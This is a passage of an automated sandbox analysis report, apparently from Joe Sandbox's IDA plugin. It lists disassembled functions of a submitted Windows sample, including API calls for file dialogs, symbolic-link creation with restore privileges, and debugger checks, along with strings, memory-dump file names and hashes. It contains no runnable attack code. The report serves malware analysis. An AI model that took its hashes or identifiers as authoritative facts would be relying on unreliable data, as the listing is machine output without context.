SetDlgItemTextW.USER32(?,00000065,?), ref: 0087B9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0087BA18
FindFirstFileW.KERNEL32(?,?), ref: 0087BA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0087BA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0087BA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0087BA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0087BA94
_swprintf.LIBCMT ref: 0087BAC4

Part of subcall function 0086400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0086401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0087BAD7
FindClose.KERNEL32(00000000), ref: 0087BADE
_swprintf.LIBCMT ref: 0087BB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 0087BB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0087BB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0087BB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 0087BB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0087BBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0087BBC9
_swprintf.LIBCMT ref: 0087BBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0087BC08
_swprintf.LIBCMT ref: 0087BC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0087BC6F

Part of subcall function 0087A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0087A662
Part of subcall function 0087A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0089E600,?,?), ref: 0087A6B1

Strings

REPLACEFILEDLG, xrefs: 0087B907
%s %s %s, xrefs: 0087BAB2, 0087BBE7
%s %s, xrefs: 0087BB29, 0087BC4E

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: ac71e8a115d19df01e5f7ee50cf7fc0cd4617020a3b301487500303b48ee1791
Instruction ID: b8cd164cd227e6ee70b518c698c663bef467dddc33f780e5126b84370750c220
Opcode Fuzzy Hash: ac71e8a115d19df01e5f7ee50cf7fc0cd4617020a3b301487500303b48ee1791
Instruction Fuzzy Hash: CA919372248348BFD621EBA4DC49FFB7BACFB89704F04481AB749D2095DB75E6048762

Function 0086718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00867191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008672F1
CloseHandle.KERNEL32(00000000), ref: 00867301

Part of subcall function 00867BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00867C04
Part of subcall function 00867BF5: GetLastError.KERNEL32 ref: 00867C4A
Part of subcall function 00867BF5: CloseHandle.KERNEL32(?), ref: 00867C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0086730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0086741A
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00867446
CloseHandle.KERNEL32(?), ref: 00867457
GetLastError.KERNEL32 ref: 00867467
RemoveDirectoryW.KERNEL32(?), ref: 008674B3
DeleteFileW.KERNEL32(?), ref: 008674DB

Strings

SeRestorePrivilege, xrefs: 008671B2
SeCreateSymbolicLinkPrivilege, xrefs: 008671BC
UNC\, xrefs: 0086723C
\??\, xrefs: 00867217

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: f9daf35331860fa7443c9a8025fd88479df3c92f30a290146eda387cb59e978b
Instruction ID: 81c9a8e5e64397bd978c040419f33ea0038e7e848985abdfe2fe424ec2b773c9
Opcode Fuzzy Hash: f9daf35331860fa7443c9a8025fd88479df3c92f30a290146eda387cb59e978b
Instruction Fuzzy Hash: ABB1F371904215ABDF21EFA8CC45BEE77B8FF04704F0544A9F949E7242DB34AA49CBA1

Function 00863281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0086328A
_memcmp.LIBVCRUNTIME ref: 00863377

Strings

CMT, xrefs: 00863990
hc%u, xrefs: 0086367B
h%u, xrefs: 0086362D

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: a42aa63cb7195505fa84b680af2f2d31cd38712c6d818f2f58a8e870c9d8b960
Instruction ID: dd18be2797715bd409968582df072979ffb9313690aaa8645e07d9ec13cd5d55
Opcode Fuzzy Hash: a42aa63cb7195505fa84b680af2f2d31cd38712c6d818f2f58a8e870c9d8b960
Instruction Fuzzy Hash: C73291715146849FDF14DF68C885AEA37A5FF15300F06447EFD8ACB282DB70AA48CB61

Function 0088D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0088D154

Strings

1#QNAN, xrefs: 0088E35A
1#IND, xrefs: 0088E34C
1#SNAN, xrefs: 0088E353
1#INF, xrefs: 0088E361

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 6a77ee81fd18ec4858bd5d726a2e18936b0dac88281dffd4b9b13f12b603d000
Instruction ID: b723d9ee78216a5ec06ee4492709f8e1fffb59983ba77ae4093f615f74070b70
Opcode Fuzzy Hash: 6a77ee81fd18ec4858bd5d726a2e18936b0dac88281dffd4b9b13f12b603d000
Instruction Fuzzy Hash: B2C24B72E086288FDB25EE28DD407EAB7B5FB44315F1545EAD84DE7280E774AE818F40

Function 008627E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008627F1
_strlen.LIBCMT ref: 00862D7F

Part of subcall function 0087137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0086B652,00000000,?,?,?,0001043E), ref: 00871396

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00862EE0

Strings

CMT, xrefs: 00862F13

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: 7adaf3a0d6eeefebc0d07166aba0e4f416ba65d6d8a9b28e78c667cf052e0085
Instruction ID: d5db80f59ac83c55edb353cf17323dd6268c16b3020bc0e8eded8b1756ec23dd
Opcode Fuzzy Hash: 7adaf3a0d6eeefebc0d07166aba0e4f416ba65d6d8a9b28e78c667cf052e0085
Instruction Fuzzy Hash: 766203715006848FDF19DF68C895AEA3BE1FF54304F0A45BEEC9ACB282DB70A945CB51

Function 0088866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00888767
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00888771
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0088877E

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 12e50b61097b172c447bcc9736eecfd16bb0cc6a16ce61efd1d09ec87580c2f6
Instruction ID: bb1766c12472f201ee86e0733c6cff6497117068fa2e5ff8bd1c3f434a105cd8
Opcode Fuzzy Hash: 12e50b61097b172c447bcc9736eecfd16bb0cc6a16ce61efd1d09ec87580c2f6
Instruction Fuzzy Hash: 5131C7759012189BCB21EF28DC88788B7B8FF58310F5041EAF50CA7251EB349F858F45

Function 0088AAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0088AC3B

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 338b7c75f42c6c0fc3d8ecca0f4ca1baad19b78f5e1e2a45de27a4dec45260f2
Instruction ID: 78fd23279d8b35b16db1ffdaa94ee16a39fde4a6987dcccab64832dbfd16908c
Opcode Fuzzy Hash: 338b7c75f42c6c0fc3d8ecca0f4ca1baad19b78f5e1e2a45de27a4dec45260f2
Instruction Fuzzy Hash: 46310471900209AFEB28EE79CC84EEB7BBEFB85314F0401AAF519D7291E6309D41CB51

Function 0088CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction ID: d34bdd9c78e12265903275d732131f3a13a94690db952ecb76c573a05a97c209
Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction Fuzzy Hash: 64020C71E002199BDF14DFA9D8806ADBBF1FF48314F25816AE919E7384D731AD418B90

Function 0087A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0087A662
GetNumberFormatW.KERNEL32(00000400,00000000,?,0089E600,?,?), ref: 0087A6B1

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 57458e87f9765bdd96d9c1377a65a055f435aaf62f4730daba2da42dc038e88c
Instruction ID: 919588745f6eb91f4f1b96a2ee1b1f8da4eea4cabe8a784836da9ffb9e7fe1ac
Opcode Fuzzy Hash: 57458e87f9765bdd96d9c1377a65a055f435aaf62f4730daba2da42dc038e88c
Instruction Fuzzy Hash: 42015E36210208BEDB21DFA4EC45F9B7BBCFF19710F005522BA08D7164D3709A14CBA5

Function 00866EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(0087117C,?,00000200), ref: 00866EC9
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00866EEA

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 302d470a84cd4ae9f7efc22fff7e3737b0a814e398c2b41c69ded1f68b4e5d8f
Instruction ID: 0abb346aac5c2cb86e706063ba1c596b6ae86142bead971aebed09d6992e8e6f
Opcode Fuzzy Hash: 302d470a84cd4ae9f7efc22fff7e3737b0a814e398c2b41c69ded1f68b4e5d8f
Instruction Fuzzy Hash: 87D0A9353C8342BFEB101A30CC06F2B3BA0B715B82F208510B313E80E0DA718024D628

Function 00891194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0089118F,?,?,00000008,?,?,00890E2F,00000000), ref: 008913C1

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 1e66c1990cea5ad1c53eeff7a028530b7cb06bfffcb72ee813f8efb49ca7a930
Instruction ID: 550410011c118cd834259ad13c93b843cb3008837de2e73a6aeac421d5d0024b
Opcode Fuzzy Hash: 1e66c1990cea5ad1c53eeff7a028530b7cb06bfffcb72ee813f8efb49ca7a930
Instruction Fuzzy Hash: 19B18D3121460ADFDF15DF28C48AB657BE1FF09364F298658E899CF2A1C335E981CB44

Function 0086407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

gj, xrefs: 008640C1

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 5b82f44ecf6ff764559b3970a575b535ec32b664e8c7b1c9dd621c122373c6ce
Instruction ID: f95ef17a1a0db26a19273c64dabaf6bd7e47972d01be763ba74c276c88baa142
Opcode Fuzzy Hash: 5b82f44ecf6ff764559b3970a575b535ec32b664e8c7b1c9dd621c122373c6ce
Instruction Fuzzy Hash: 6EF1C3B1A083418FD748CF29D880A1AFBE1BFCC208F19896EF598D7711E634E9558B56

Function 0086ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0086AD1A

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: b107ec4be97ab7b2e695b39cf5283ee287986617c5b7e70326766764f4f6bfd9
Instruction ID: e70dab8449833e0aafe260b6d24d406da86f43e5abb30e0819dbde950b5675c6
Opcode Fuzzy Hash: b107ec4be97ab7b2e695b39cf5283ee287986617c5b7e70326766764f4f6bfd9
Instruction Fuzzy Hash: 43F03AB4D0020C8FDB28DF18EC416E977B5F759715F20029AE919A3BA4D770AE40CEA2

Function 0087F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0087EAC5), ref: 0087F068

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: cc61bc5eafcd4c0e6821f166eb309dea539d39148f098d74de273392faa70c95
Instruction ID: 4bc12bffe9d61b815e637aab77a6822f12a1baacd43569b97d59d4efb3ac7c13
Opcode Fuzzy Hash: cc61bc5eafcd4c0e6821f166eb309dea539d39148f098d74de273392faa70c95
Instruction Fuzzy Hash:

Function 0088B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0088B710

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1341ad94c3c036f7b06adc4de9f72ca9786ff181abd014175bc10b029333336f
Instruction ID: d8add07c839d5754fade8ca3a7395eb6433c1e03275e600cdfe1bb666fd47d13
Opcode Fuzzy Hash: 1341ad94c3c036f7b06adc4de9f72ca9786ff181abd014175bc10b029333336f
Instruction Fuzzy Hash: 43A001B46012018B9B409F76AA4DA093AA9BA56695B09826AA509C6171EA3485609F01

Function 00875C77 Relevance: .8, Instructions: 800COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
Instruction ID: 09bc95ea6b7ed361b28b3b01478741b78509fcdad3e1f1b7524ed8127dd8ad4f
Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
Instruction Fuzzy Hash: 4F62C571604B899FCB29CF28C8906B9BBE1FB55304F08C56DD89ECB74AE670E955CB10

Function 008770BF Relevance: .8, Instructions: 773COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
Instruction ID: fa48fbbe18d8a542b697c1158abc31e44d0a3166b6877c323eb598c6035df2e2
Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
